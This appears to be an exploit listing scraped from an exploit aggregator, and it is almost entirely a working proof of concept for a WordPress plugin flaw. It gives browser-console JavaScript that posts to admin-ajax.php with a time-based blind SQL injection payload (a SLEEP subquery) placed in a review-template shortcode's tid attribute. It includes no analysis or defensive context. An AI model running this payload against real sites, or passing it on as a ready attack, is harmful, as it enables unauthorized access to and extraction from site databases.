Share 
## https://sploitus.com/exploit?id=WPEX-ID:D3BB0EAC-1F4E-4191-8F3B-104A5BB54558
Run the following code in the browser console on any WP Admin page.

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=parse-media-shortcode&shortcode=[wprevpro_usetemplate tid="1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)"]'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));